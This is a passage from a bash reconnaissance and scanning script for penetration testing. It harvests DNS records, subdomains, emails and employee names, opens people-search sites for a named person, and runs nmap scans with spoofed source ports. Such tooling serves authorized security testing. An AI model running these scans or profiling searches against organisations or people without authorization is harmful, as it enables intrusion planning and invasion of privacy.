# Collect candidate IPs from the DNS records (3rd column) and brute-forced
# sub-domains (2nd column), keep only dotted-quad addresses, drop known
# placeholder/bogus values, and sort them numerically into hosts.
awk '{print $3}' records > tmp
awk '{print $2}' sub-dnsrecon >> tmp
# Bug fix: the dots in the IP pattern were unescaped ('.' matches any
# character), admitting non-IP strings; escaped to match the stricter
# form used elsewhere in this script.
grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' tmp | egrep -v '(-|=|:|1.1.1.1|6.9.6.9|127.0.0.1)' | $sip > hosts
echo " Zone Transfer (3/$total)"
dnsrecon -d $domain -t axfr > tmp
egrep -v '(Checking for|filtered|No answer|NS Servers|Removing|TCP Open|Testing NS)' tmp | sed 's/^....//g; /^$/d' > zonetransfer
echo
echo "Web Application Firewall (4/$total)"
# wafw00f fingerprints any WAF in front of www.$domain; strip its banner art
wafw00f -a http://www.$domain > tmp 2>/dev/null
egrep -v '(By Sandro|Checking http://www.|Generic Detection|requests|WAFW00F)' tmp | sed "s/ http:\/\/www.$domain//g" | egrep -v "(\_|\^|\||<|')" | sed '1,4d' > waf
echo
echo "Traceroute"
echo " UDP (5/$total)"
# Three traceroute probes (UDP, ICMP echo, TCP SYN) concatenated with headers
echo "UDP" > tmp
traceroute $domain | awk -F" " '{print $1,$2,$3}' >> tmp
echo >> tmp
echo "ICMP ECHO" >> tmp
echo " ICMP ECHO (6/$total)"
traceroute -I $domain | awk -F" " '{print $1,$2,$3}' >> tmp
echo >> tmp
echo "TCP SYN" >> tmp
echo " TCP SYN (7/$total)"
traceroute -T $domain | awk -F" " '{print $1,$2,$3}' >> tmp
grep -v 'traceroute' tmp > tmp2
# Remove blank lines from end of file
awk '/^[[:space:]]*$/{p++;next} {for(i=0;i<p;i++){printf "\n"}; p=0; print}' tmp2 > ztraceroute
echo
echo "Whatweb (~5 min) (8/$total)"
# Fingerprint every sub-domain listed in the report page
grep -v '<' $home/data/$domain/data/subdomains.htm | awk '{print $1}' > tmp
whatweb -i tmp --color=never --no-errors > tmp2 2>/dev/null
# Find lines that start with http, and insert a line after
sort tmp2 | sed '/^http/a\ ' > tmp3
# Cleanup
cat tmp3 | sed 's/,/\n/g; s/\[200 OK\]/\n\[200 OK\]\n/g; s/\[301 Moved Permanently\]/\n\[301 Moved Permanently\]\n/g; s/\[302 Found\]/\n\[302 Found\]\n/g; s/\[404 Not Found\]/\n\[404 Not Found\]\n/g' | egrep -v '(Unassigned|UNITED STATES)' | sed 's/^[ \t]*//' | cat -s | more > whatweb
# Harvest any corporate email addresses whatweb surfaced
grep '@' whatweb | sed 's/Email//g; s/\[//g; s/\]//g' | tr '[A-Z]' '[a-z]' | grep "@$domain" | grep -v 'hosting' | cut -d ' ' -f2 | sort -u > emails
rm tmp*
# Remove all empty files
find $home/data/$domain/ -type f -empty -exec rm {} +
echo
echo "recon-ng (9/$total)"
# Build the active recon-ng resource script from the template
cp $discover/resource/recon-ng-active.rc active.rc
sed -i "s/xxx/$companyurl/g" active.rc
sed -i 's/%26/\&/g; s/%20/ /g; s/%2C/\,/g' active.rc
sed -i "s/yyy/$domain/g" active.rc
recon-ng --no-check -r $discover/active.rc
##############################################################
# Build the active-recon summary: counts into zreport, listings into tmp.
echo "Summary" > zreport
echo $short >> zreport
echo > tmp
if [ -e emails ]; then
emailcount=$(wc -l emails | cut -d ' ' -f1)
echo "Emails $emailcount" >> zreport
echo "Emails ($emailcount)" >> tmp
echo $short >> tmp
cat emails >> tmp
echo >> tmp
fi
if [ -e hosts ]; then
hostcount=$(wc -l hosts | cut -d ' ' -f1)
echo "Hosts $hostcount" >> zreport
echo "Hosts ($hostcount)" >> tmp
echo $short >> tmp
cat hosts >> tmp
echo >> tmp
fi
if [ -e records ]; then
recordcount=$(wc -l records | cut -d ' ' -f1)
echo "DNS Records $recordcount" >> zreport
echo "DNS Records ($recordcount)" >> tmp
echo $long >> tmp
cat records >> tmp
echo >> tmp
fi
if [ -e subdomains ]; then
subdomaincount=$(wc -l subdomains | cut -d ' ' -f1)
echo "Subdomains $subdomaincount" >> zreport
echo "Subdomains ($subdomaincount)" >> tmp
echo $long >> tmp
cat subdomains >> tmp
echo >> tmp
fi
# Assemble the final active-recon report: fold the detail listings into
# zreport, append each tool's section, then publish zreport and the
# per-tool results to their respective HTML pages.
cat tmp >> zreport
{
     echo "Web Application Firewall"
     echo $long
     cat waf
     echo
     echo "Traceroute"
     echo $long
     cat ztraceroute
     echo
     echo "Zone Transfer"
     echo $long
     cat zonetransfer
     echo
     echo "Whatweb"
     echo $long
     cat whatweb
} >> zreport
{
     cat zreport
     echo "</pre>"
} >> $home/data/$domain/data/active-recon.htm
{
     cat ztraceroute
     echo "</pre>"
} >> $home/data/$domain/data/traceroute.htm
{
     cat waf
     echo "</pre>"
} >> $home/data/$domain/data/waf.htm
{
     cat whatweb
     echo "</pre>"
} >> $home/data/$domain/data/whatweb.htm
{
     cat zonetransfer
     echo "</pre>"
} >> $home/data/$domain/data/zonetransfer.htm
# Merge newly found emails into the existing emails.htm page: combine the
# old page content (minus HTML tags) with the new results, dedupe, then
# rebuild the page with the HTML header lines back on top.
if [[ -e $home/data/$domain/data/emails.htm && -e emails ]]; then
cat $home/data/$domain/data/emails.htm emails | grep -v '<' | sort -u > tmp-new-emails
cat $home/data/$domain/data/emails.htm | grep '<' > tmp-new-page
mv tmp-new-page $home/data/$domain/data/emails.htm
# Bug fix: was 'tmp-new-email' (missing trailing s), which does not exist,
# so the merged email list was never written back to the page.
cat tmp-new-emails >> $home/data/$domain/data/emails.htm
echo "</pre>" >> $home/data/$domain/data/emails.htm
fi
# Merge newly found hosts into the existing hosts.htm page (same pattern
# as the email merge above); $sip sorts IPs numerically.
if [[ -e $home/data/$domain/data/hosts.htm && -e hosts ]]; then
cat $home/data/$domain/data/hosts.htm hosts | grep -v '<' | $sip > tmp-new-hosts
cat $home/data/$domain/data/hosts.htm | grep '<' > tmp-new-page
mv tmp-new-page $home/data/$domain/data/hosts.htm
cat tmp-new-hosts >> $home/data/$domain/data/hosts.htm
echo "</pre>" >> $home/data/$domain/data/hosts.htm
fi
# Archive working files, show the closing message, open the report
mv active.rc emails hosts record* sub* waf whatweb z* /tmp/subdomains $home/data/$domain/tools/active/ 2>/dev/null
rm tmp*
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The supporting data folder is located at ${YELLOW}$home/data/$domain/${NC}\n"
echo
echo
$web $home/data/$domain/index.htm &
exit
;;
3)
# Import a 'last, first' name list into an existing recon-ng workspace,
# dedupe the contacts table, and export it to a text report.
clear
f_banner
echo -e "${BLUE}Import names into an existing recon-ng workspace.${NC}"
echo
echo "Example: last, first"
f_location
# Build the recon-ng-importable CSV with a '#' delimiter
echo "last_name#first_name" > /tmp/names.csv
sed 's/, /#/' $location >> /tmp/names.csv
echo -n "Use Workspace: "
read -e workspace
# Check for no answer
if [[ -z $workspace ]]; then
f_error
fi
# Check for wrong answer
if [ ! -d /root/.recon-ng/workspaces/$workspace ]; then
f_error
fi
# Build a one-off resource script: select workspace, import names,
# dedupe contacts, then spool the sorted contact list to /tmp/names.
echo "workspaces select $workspace" > tmp.rc
echo >> tmp.rc
cat $discover/resource/recon-ng-import-names.rc >> tmp.rc
echo >> tmp.rc
echo "query DELETE FROM contacts WHERE rowid NOT IN (SELECT min(rowid) FROM contacts GROUP BY first_name, last_name, email)" >> tmp.rc
echo >> tmp.rc
echo "spool start /tmp/names" >> tmp.rc
echo "query SELECT DISTINCT last_name,first_name,title FROM contacts WHERE first_name OR last_name IS NOT NULL ORDER BY last_name,first_name ASC" >> tmp.rc
echo "spool stop" >> tmp.rc
echo "exit" >> tmp.rc
recon-ng --no-check -r $discover/tmp.rc
# Strip the spool header (3 lines) and footer (4 lines)
sed '1,3d' /tmp/names | head -n -4 > $home/data/$workspace-names.txt
rm tmp.rc /tmp/names*
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/$workspace-names.txt${NC}\n"
echo
echo
exit
;;
4) f_main;;
*) f_error;;
esac
}
##############################################################################################################
f_person(){
# Open a series of people-search sites in the local browser ($web) for a
# first/last name supplied by the user, spacing launches with sleeps.
f_runlocally
clear
f_banner
echo -e "${BLUE}RECON${NC}"
echo
echo -n "First name: "
read firstName
# Check for no answer
if [[ -z $firstName ]]; then
f_error
fi
echo -n "Last name: "
read lastName
# Check for no answer
if [[ -z $lastName ]]; then
f_error
fi
$web &
sleep 2
$web http://www.411.com/name/$firstName-$lastName/ &
sleep 2
uripath="http://www.advancedbackgroundchecks.com/search/results.aspx?type=&fn=${firstName}&mi=&ln=${lastName}&age=&city=&state="
$web $uripath &
sleep 2
$web https://www.linkedin.com/pub/dir/?first=$firstName\&last=$lastName\&search=Search &
sleep 2
$web http://www.peekyou.com/$firstName%5f$lastName &
sleep 2
$web http://phonenumbers.addresses.com/people/$firstName+$lastName &
sleep 2
$web https://pipl.com/search/?q=$firstName+$lastName\&l=\&sloc=\&in=5 &
sleep 2
$web http://www.spokeo.com/$firstName-$lastName &
sleep 2
# Bug fix: the '&' before src=typd was unescaped, truncating the URL and
# running 'src=typd' as a separate shell command.
$web https://twitter.com/search?q=%22$firstName%20$lastName%22\&src=typd &
sleep 2
$web https://www.youtube.com/results?search_query=$firstName+$lastName &
sleep 2
# Bug fix: every '&' in this query string was unescaped, so the URL was
# truncated at 'sname=' and each 'key=value' fragment ran as a command.
$web http://www.zabasearch.com/query1_zaba.php?sname=$firstName%20$lastName\&state=ALL\&ref=$ref\&se=$se\&doby=\&city=\&name_style=1\&tm=\&tmr= &
f_main
}
##############################################################################################################
f_salesforce(){
clear
f_banner
echo -e "${BLUE}Create a free account at salesforce (https://connect.data.com/login).${NC}"
echo -e "${BLUE}Perform a search on your target > select the company name > see all.${NC}"
echo -e "${BLUE}Copy the results into a new file.${NC}"
echo -e "${BLUE}[*] Note: each record should be on a single line.${NC}"
f_location
echo
# Remove blank lines, strings, and leading white space. Set tab as the delimiter
cat $location | sed '/^$/d; s/Direct Dial Available//g; s/[] //g; s/^[ \t]*//; s/ \+ /\t/g' > tmp
# Place names into a file and sort by uniq
cut -d $'\t' -f1 tmp | sort -u > tmp2
# grep name, sort by data field, then uniq by the name field - selecting the most recent entry
# select and and title from result and colon delimit into file
while read line; do
grep "$line" tmp | sort -t ',' -k7M | sort -uk1,1r | awk -F$'\t' '{print $1":"$3}' | sed 's/ :/:/g' >> tmp3
done < tmp2
column -s ':' -t tmp3 > tmp4
# Clean-up
cat tmp4 | sed 's/ -- /, /g; s/ - /, /g; s/,,/,/g; s/, ,/, /g; s/\//, /g; s/[^ ]\+/\L\u&/g; s/-.*$//g; s/1.*$//g; s/1/I/g; s/2/II/g; s/3/III/g; s/4/IV/g;
s/5/V/g; s/2cfinancedistributionoperations//g; s/-administration/, Administration/g; s/-air/, Air/g; s/, , and$//g; s/ And / and /g; s/ at.*$//g;
s/ asic / ASIC /g; s/ Asm/ ASM/g; ; s/ api / API /g; s/AssistantChiefPatrolAgent/Assistant Chief Patrol Agent/g; s/-associate/-associate/g; s/ at .*//g;
s/ At / at /g; s/ atm / ATM /g; s/ bd / BD /g; s/-big/, Big/g; s/BIIb/B2B/g; s/-board/, Board/g; s/-boiler/, Boiler/g; s/ bsc / BSC /g; s/-call/, Call/g;
s/-capacity/, Capacity/g; s/-cash/, Cash/g; s/ cbt / CBT /g; s/ Cc/ CC/g; s/-chief/, Chief/g; s/ cip / CIP /g; s/ cissp / CISSP /g; s/-civil/, Civil/g;
s/ cj / CJ /g; s/Clients//g; s/ cmms / CMMS /g; s/ cms / CMS /g; s/-commercial/, Commercial/g;
s/CommitteemanagementOfficer/Committee Management Officer/g; s/-communications/, Communications/g; s/-community/, Community/g;
s/-compliance/, Compliance/g; s/-consumer/, Consumer/g; s/contact sold, to//g; s/-corporate/, Corporate/g; s/ cpa/ CPA/g; s/-creative/, Creative/g;
s/ Crm / CRM /g; s/ Csa/ CSA/g; s/ Csc/ CSC/g; s/ctr /Center/g; s/-customer/, Customer/g; s/Datapower/DataPower/g; s/-data/, Data/g; s/ db2 / DB2 /g;
s/ dbii / DB2 /g; s/ Dc/ DC/g; s/DDesigner/Designer/g; s/DesignatedFederalOfficial/Designated Federal Official/g; s/-design/, Design/g; s/dhs/DHS/g;
s/-digital/, Digital/g; s/-distribution/, Distribution/g; s/ Disa / DISA /g; s/ dns / DNS /g; s/-dominion/-dominion/g; s/-drilling/, Drilling/g;
s/ dvp / DVP /g; s/ ebs / EBS /g; s/ Edi / EDI /g; s/editorr/Editor/g; s/ edrm / EDRM /g; s/ eeo / EEO /g; s/ efi / EFI /g; s/-electric/, Electric/g;
s/EleCenterEngineer/Electric Engineer/g; s/ emc / EMC /g; s/ emea/ EMEA/g; s/-employee/, Employee/g; s/ ems / EMS /g; s/-energy/, Energy/g;
s/engineer5/Engineer V/g; s/-engineering/, Engineering/g; s/-engineer/, Engineer/g; s/-environmental/, Environmental/g; s/-executive/, Executive/g;
s/faa / FAA /g; s/-facilities/, Facilities/g; s/ Fdr / FDR /g; s/ ferc / FERC /g; s/ fha / FHA /g; s/-finance/, Finance/g; s/-financial/, Financial/g;
s/-fleet/, Fleet/g; s/ For / for /g; s/ fsa / FSA /g; s/ fso / FSO /g; s/ fx / FX /g; s/ gaap / GAAP /g; s/-gas/, Gas/g; s/-general/, General/g;
s/-generation/, Generation/g; s/grp/Group/g; s/ gsa / GSA /g; s/ gsis / GSIS /g; s/ gsm / GSM /g; s/Hbss/HBSS/g; s/ hd / HD /g; s/ hiv / HIV /g;
s/ hmrc / HMRC /g; s/ hp / HP /g; s/ hq / HQ /g; s/ hris / HRIS /g; s/-human/, Human/g; s/ hvac / HVAC /g; s/ ia / IA /g; s/ id / ID /g; s/ iii/ III/g;
s/ Ii/ II/g; s/ Iis / IIS /g; s/ In / in /g; s/-industrial/, Industrial/g; s/information technology/IT/g; s/-information/, Information/g;
s/-infrastructure/, Infrastructure/g; s/-instrumentation/, Instrumentation/g; s/-internal/, Internal/g; s/ ip / IP /g; s/ ir / IR /g; s/ Issm/ ISSM/;
s/itenterpriseprojectmanager/IT Enterprise Project Manager/g; s/-IT/, IT/g; s/ iv / IV /g; s/ Iv,/ IV,/g; s/Jboss/JBoss/g; s/ jc / JC /g; s/ jd / JD /g;
s/ jt / JT /g; s/konsult, konsultchef, projektledare/Consultant/g; s/laboratorynetwork/Laboratory, Network/g; s/-labor/, Labor/g;
s/lan administrator/LAN Administrator/g; s/lan admin/LAN Admin/g; s/-land/, Land/g; s/-licensing/, Licensing/g; s/LawIII60/Law360/g; s/ llc / LLC. /g;
s/-logistics/, Logistics/g; s/ Lp/ LP/g; s/lvl/Level/g; s/-mail/, Mail/g; s/-manager/, Manager/g; s/-marketing/, Marketing/g; s/-materials/, Materials/g;
s/ mba / MBA /g; s/Mca/McA/g; s/Mcb/McB/g; s/Mcc/McC/g; s/Mcd/McD/g; s/Mce/McE/g; s/Mcf/McF/g; s/Mcg/McG/g; s/Mch/McH/g; s/Mci/McI/g; s/Mcj/McJ/g;
s/Mck/McK/g; s/Mcl/McL/g; s/Mcm/McM/g; s/Mcn/McN/g; s/Mcq/McQ/g; s/Mcv/McV/g; s/mcse/MCSE/g; s/-mechanical/, Mechanical/g; s/-metals/, Metals/g;
s/-metro/, Metro/g; s/, mp//g; s/ nerc / NERC /g; s/mcp/McP/g; s/mcq/McQ/g; s/mcs/McS/g; s/-media/, Media/g;
s/-mergers/,Mergers/g; s/-millstone/, Millstone/g; s/-motor/, Motor/g; s/ mssp / MSSP /g; s/-networking/, Networking/g; s/-network/, Network/g;
s/-new/, New/g; s/-north/, North/g; s/not in it//g; s/ nso / NSO /g; s/-nuclear/, Nuclear/g; s/ Nz / NZ /g; s/ oem / OEM /g; s/-office/, Office/g;
s/ Of / of /g; s/-operations/, Operations/g; s/-oracle/, Oracle/g; s/-other/, Other/g; s/ pca / PCA /g; s/ pcs / PCS /g; s/ pc / PC /g; s/ pdm / PDM /g;
s/ phd / PhD /g; s/ pj / PJ /g; s/-plant/, Plant/g; s/plt/Plant/g; s/pmo/PMO/g; s/Pmp/PMP/g; s/ pm / PM /g; s/ Pm / PM /g; s/-power/, Power/g;
s/-property/, Property/g; s/-public/, Public/g; s/ Psa/ PSA/g; s/pyble/Payble/g; s/ os / OS /g; s/r&d/R&D/g; s/ r and d /R&D/g; s/-records/, Records/g;
s/-regulated/, Regulated/g; s/-regulatory/, Regulatory/g; s/-related/, Related/g; s/-remittance/, Remittance/g; s/-renewals/, Renewals/g;
s/-revenue/, Revenue/g; s/ rfid / RFID /g; s/ rfp / RFP /g; s/ rf / RF /g; s/ Roip / RoIP /g; s/Rtls/RTLS/g; s/ Rtm/ RTM/g; s/saas/SaaS/g;
s/-safety/, Safety/g; s/san manager/SAN Manager/g; s/scada/SCADA/g; s/sdlc/SDLC/g; s/setac-/SETAC,/g; s/sftwr/Software/g; s/-short/, Short/g;
s/ smb / SMB /g; s/sms/SMS/g; s/smtp/SMTP/g; s/snr/Senior/g; s/.specialist./ Specialist /g; s/ Soc / SOC /g; s/sql/SQL/g; s/spvr/Supervisor/g;
s/srbranch/Senior Branch/g; s/srsales/Senior Sales/g; s/ ssl / SSL /g; s/-staff/, Staff/g; s/stf/Staff/g; s/-station/, Station/g;
s/-strategic/, Strategic/g; s/-student/, Student/g; s/-substation/, Substation/g; s/-supplier/, Supplier/g; s/-supply/, Supply/g;
s/-surveillance/, Surveillance/g; s/swepco/SWEPCO/g; s/-system/, System/g; s/-tax/, Tax/g; s/-technical/, Technical/g;
s/-telecommunications/, Telecommunications/g; s/ The / the /g; s/-three/, Three/g; s/-tickets/, Tickets/g; s/TierIII/Tier III/g; s/-trading/, Trading/g;
s/-transmission/, Transmission/g; s/ttechnical/Technical/g; s/-turbine/, Turbine/g; s/ to .*$//g; s/ ui / UI /g; s/ uk / UK /g;
s/unsupervisor/Supervisor/g; s/uscg/USCG/g; s/ usa / USA /g; s/ us / US /g; s/ Us / US /g; s/ u.s / US /g; s/usmc/USMC/g; s/-utility/, Utility/g;
s/ ux / UX /g; s/vicepresident/Vice President/g; s/ Va / VA /g; s/ vii / VII /g; s/ vi / VI /g; s/ vms / VMS /g; s/ voip / VoIP /g; s/ vpn / VPN /g;
s/Weblogic/WebLogic/g; s/Websphere/WebSphere/g; s/ With / with /g' > tmp5
# Remove lines that contain 2 words and clean up.
awk 'NF != 2' tmp5 | sed "s/d'a/D'A/g; s/d'c/D'C/g; s/d'e/D'E/g; s/d'h/D'H/g; s/d's/D'S/g; s/l'a/L'A/g; s/o'b/O'B/g; s/o'c/O'C/g; s/o'd/O'D/g;
s/o'f/O'F/g; s/o'g/O'G/g; s/o'h/O'H/g; s/o'k/O'K/g; s/o'l/O'L/g; s/o'm/O'M/g; s/o'N/O'N/g; s/Obrien/O'Brien/g; s/Oconnor/O'Connor/g;
s/Odonnell/O'Donnell/g; s/Ohara/O'Hara/g; s/o'p/O'P/g; s/o'r/O'R/g; s/o's/O'S/g; s/Otoole/O'Toole/g; s/o't/O'T/i" > tmp6
# Replace parenthesis and the contents inside with spaces - thanks Mike G
cat tmp6 | perl -pe 's/(\(.*\))/q[ ] x length $1/ge' > tmp7
# Remove trailing white space, railing commas, and delete lines with a single word
sed 's/[ \t]*$//; s/,$//; /[[:blank:]]/!d' tmp7 | sort -u > $home/data/names.txt
rm tmp*
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/names.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_generateTargetList(){
# Menu for building a target list of live hosts on the local network.
clear
f_banner
echo -e "${BLUE}SCANNING${NC}"
echo
echo "1. Local area network"
echo "2. NetBIOS"
echo "3. netdiscover"
echo "4. Ping sweep"
echo "5. Previous menu"
echo
echo -n "Choice: "
# -r keeps backslashes in the answer literal
read -r choice
case $choice in
1) f_errorOSX
echo
echo -n "Interface to scan: "
read -r interface
# Check for no answer
if [[ -z $interface ]]; then
f_error
fi
# ARP scan the local segment; drop arp-scan chatter and known-noise
# vendors, keep just the IPs, sort uniquely ($sip) and remove blanks.
# $interface is quoted so an accidental space can't become extra args.
arp-scan -l -I "$interface" | egrep -v '(arp-scan|Interface|packets|Polycom|Unknown)' | awk '{print $1}' | $sip | sed '/^$/d' > $home/data/hosts-arp.txt
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/hosts-arp.txt${NC}\n"
echo
echo
exit;;
2) f_errorOSX; f_netbios;;
3) f_errorOSX; f_netdiscover;;
4) f_pingsweep;;
5) f_main;;
*) f_error;;
esac
}
##############################################################################################################
f_netbios(){
# NetBIOS name-service scan (nbtscan) against either a file of IPs
# or a CIDR block.
clear
f_banner
echo -e "${BLUE}Type of input:${NC}"
echo
echo "1. List containing IPs."
echo "2. CIDR"
echo
echo -n "Choice: "
# -r keeps backslashes in the answer literal
read -r choice
case $choice in
1)
# f_location prompts for, validates, and sets $location
f_location
echo
echo $medium
echo
# Quoted so a path containing spaces is passed as one argument
nbtscan -f "$location"
echo
echo
exit;;
2)
echo
echo -n "Enter your CIDR: "
read -r cidr
# Check for no answer
if [[ -z $cidr ]]; then
f_error
fi
echo
echo $medium
echo
nbtscan -r "$cidr"
echo
echo
exit;;
*) f_error;;
esac
}
##############################################################################################################
f_netdiscover(){
# Passive-ish ARP discovery of the local /24 using netdiscover.
# Derive the network from the first interface that has a global-scope
# address; -m 1 guards against multi-homed hosts, where matching every
# 'global' line would produce a garbage multi-line range.
range=$(ip addr | grep -m 1 'global' | cut -d '/' -f1 | awk '{print $2}' | cut -d '.' -f1-3)'.1'
netdiscover -r "$range" -f -P | grep ':' | awk '{print $1}' > $home/data/netdiscover.txt
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/netdiscover.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_pingsweep(){
# Nmap ping sweep (-sn, TCP SYN + ICMP echo probes) for live hosts;
# the surviving IPs are written to $home/data/hosts-ping.txt.
clear
f_banner
# Sets $sourceport (and $maxrtt) used below
f_typeofscan
echo -e "${BLUE}Type of input:${NC}"
echo
echo "1. List containing IPs, ranges and/or CIDRs."
echo "2. Manual"
echo
echo -n "Choice: "
# -r keeps backslashes in the answer literal
read -r choice
case $choice in
1)
f_location
echo
echo "Running an Nmap ping sweep for live hosts."
nmap -sn -PS -PE --stats-every 10s -g $sourceport -iL "$location" > tmp
;;
2)
echo
echo -n "Enter your targets: "
read -r manual
# Check for no answer
if [[ -z $manual ]]; then
f_error
fi
echo
echo "Running an Nmap ping sweep for live hosts."
# $manual is intentionally unquoted: the user may enter several
# space-separated targets and nmap needs them as separate arguments.
nmap -sn -PS -PE --stats-every 10s -g $sourceport $manual > tmp
;;
*) f_error;;
esac
# Field 5 of each "Nmap scan report for <ip>" line is the address.
grep 'report' tmp | awk '{print $5}' > $home/data/hosts-ping.txt
rm tmp
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/hosts-ping.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_scanname(){
# Prompt for a scan name and create a working directory of that name.
# The name is reused unquoted all over the scan pipeline, so names
# containing spaces are rejected instead of merely warned about.
f_typeofscan
echo -e "${YELLOW}[*] Warning spaces in the name will cause errors${NC}"
echo
echo -n "Name of scan: "
read -r name
# Check for no answer
if [[ -z $name ]]; then
f_error
fi
# Check for spaces -- they break the later unquoted uses of $name
if [[ $name == *' '* ]]; then
f_error
fi
mkdir -p "$name"
}
##############################################################################################################
f_typeofscan(){
# Ask whether this is an external or internal scan and tune the spoofed
# source port and max probe round-trip time used by the later nmap runs.
echo -e "${BLUE}Type of scan: ${NC}"
echo
echo "1. External"
echo "2. Internal"
echo "3. Previous menu"
echo
echo -n "Choice: "
read choice
if [ "$choice" = "1" ]; then
# External: DNS source port slips through many stateless filters
echo
echo -e "${YELLOW}[*] Setting source port to 53 and max probe round trip to 1.5s.${NC}"
sourceport=53
maxrtt=1500ms
echo
echo $medium
echo
elif [ "$choice" = "2" ]; then
# Internal: Kerberos source port, tighter RTT for a LAN
echo
echo -e "${YELLOW}[*] Setting source port to 88 and max probe round trip to 500ms.${NC}"
sourceport=88
maxrtt=500ms
echo
echo $medium
echo
elif [ "$choice" = "3" ]; then
f_main
else
f_error
fi
}
##############################################################################################################
f_cidr(){
# Full scan of a CIDR block, with an optional exclusion file.
clear
f_banner
f_scanname
echo
echo Usage: 192.168.0.0/16
echo
echo -n "CIDR: "
read -r cidr
# Check for no answer
if [[ -z $cidr ]]; then
rm -rf "$name"
f_error
fi
# Check for wrong answer: must look like a.b.c.d/nn.
# One regex replaces the old separate slash-present, bad-character and
# mask-size tests, and avoids the "integer expression expected" error
# the old code produced (and then ignored) on a non-numeric mask.
if [[ ! $cidr =~ ^[0-9]{1,3}(\.[0-9]{1,3}){3}/[0-9]{1,2}$ ]]; then
rm -rf "$name"
f_error
fi
# The regex allows up to two digits, so still reject masks above /32.
sub=$(echo "$cidr" | cut -d '/' -f2)
if [ "$sub" -gt 32 ]; then
rm -rf "$name"
f_error
fi
echo "$cidr" > tmp-list
location=tmp-list
echo
echo -n "Do you have an exclusion list? (y/N) "
read -r exclude
if [ "$exclude" == "y" ]; then
echo -n "Enter the path to the file: "
read -r excludefile
# Check for no answer
if [[ -z $excludefile ]]; then
f_error
fi
# Check that the file actually exists
if [ ! -f "$excludefile" ]; then
f_error
fi
else
# No exclusions: nmap still needs a file, so hand it an empty one.
touch tmp
excludefile=tmp
fi
START=$(date +%r\ %Z)
f_scan
f_ports
f_scripts
f_metasploit
f_report
}
##############################################################################################################
f_list(){
# Full scan of targets supplied in a file chosen via f_location.
clear
f_banner
f_scanname
f_location
# This mode has no exclusions; nmap still needs a file, so use an empty one.
excludefile=tmp
touch "$excludefile"
START=$(date '+%r %Z')
f_scan
f_ports
f_scripts
f_metasploit
f_report
}
##############################################################################################################
f_single(){
# Full scan of a single IP, range, or URL.
clear
f_banner
f_scanname
echo
echo -n "IP, range, or URL: "
read -r target
# Check for no answer
if [[ -z $target ]]; then
rm -rf "$name"
f_error
fi
# printf writes the target exactly as typed; unquoted echo would
# collapse whitespace and some shells' echo would eat backslashes.
printf '%s\n' "$target" > tmp-target
location=tmp-target
# No exclusions for this mode; nmap still needs a file, so use an empty one.
touch tmp
excludefile=tmp
START=$(date +%r\ %Z)
f_scan
f_ports
f_scripts
f_metasploit
f_report
}
##############################################################################################################
f_scan(){
# Core discovery scan. Prompts for scan breadth, version detection and
# delay, then runs one combined TCP SYN + UDP nmap scan with OS detection
# against $location (minus $excludefile), writing nmap output to $name/nmap.*
# and deriving hosts.txt, ports*.txt, banners.txt, http.txt and https.txt.
# Requires $sourceport and $maxrtt from f_typeofscan.
# Curated list of high-value TCP ports used for the default (non-full) scan.
custom='1-1040,1050,1080,1099,1158,1344,1352,1433,1521,1720,1723,1883,1911,1962,2049,2202,2375,2628,2947,3000,3031,3050,3260,3306,3310,3389,3500,3632,4369,5000,5019,5040,5060,5432,5560,5631,5632,5666,5672,5850,5900,5920,5984,5985,6000,6001,6002,6003,6004,6005,6379,6666,7210,7634,7777,8000,8009,8080,8081,8091,8140,8222,8332,8333,8400,8443,8834,9000,9084,9100,9160,9600,9999,10000,11211,12000,12345,13364,19150,27017,28784,30718,35871,37777,46824,49152,50000,50030,50060,50070,50075,50090,60010,60030'
# Every TCP port, used when the user requests a full scan.
full='1-65535'
# UDP ports worth probing (DNS, NTP, SNMP, IPMI, ICS protocols, etc.).
udp='53,67,123,137,161,407,500,523,623,1434,1604,1900,2302,2362,3478,3671,4800,5353,5683,6481,17185,31337,44818,47808'
echo
echo -n "Perform full TCP port scan? (y/N) "
read scan
if [ "$scan" == "y" ]; then
tcp=$full
else
tcp=$custom
fi
echo
echo -n "Perform version detection? (y/N) "
read vdetection
# S/U become the nmap scan-type flags: -sSV/-sUV with versioning, else -sS/-sU.
if [ "$vdetection" == "y" ]; then
S='sSV'
U='sUV'
else
S='sS'
U='sU'
fi
echo
echo -n "Set scan delay. (0-5, enter for normal) "
read delay
# Check for no answer
if [[ -z $delay ]]; then
delay='0'
fi
if [ $delay -lt 0 ] || [ $delay -gt 5 ]; then
f_error
fi
echo
echo $medium
# Single combined run: SYN+UDP probes for host discovery, OS guess capped at
# one try, -g spoofs the source port, rate/RTT limits tuned by f_typeofscan,
# and -oA writes nmap.nmap/.gnmap/.xml under the scan directory.
nmap -iL $location --excludefile $excludefile --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 -$S -$U -O --osscan-guess --max-os-tries 1 -p T:$tcp,U:$udp --max-retries 3 --min-rtt-timeout 100ms --max-rtt-timeout $maxrtt --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -g $sourceport --scan-delay $delay -oA $name/nmap
# Bail out (and remove the scan dir) if nothing responded.
x=$(grep '(0 hosts up)' $name/nmap.nmap)
if [[ -n $x ]]; then
rm -rf "$name" tmp
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "${YELLOW}[*] No live hosts were found.${NC}"
echo
echo
exit
fi
# Clean up
# Strip hex-dump lines, OS-detection chatter and other noise; drop the
# "Nmap scan report for" prefix and collapse runs of blank lines.
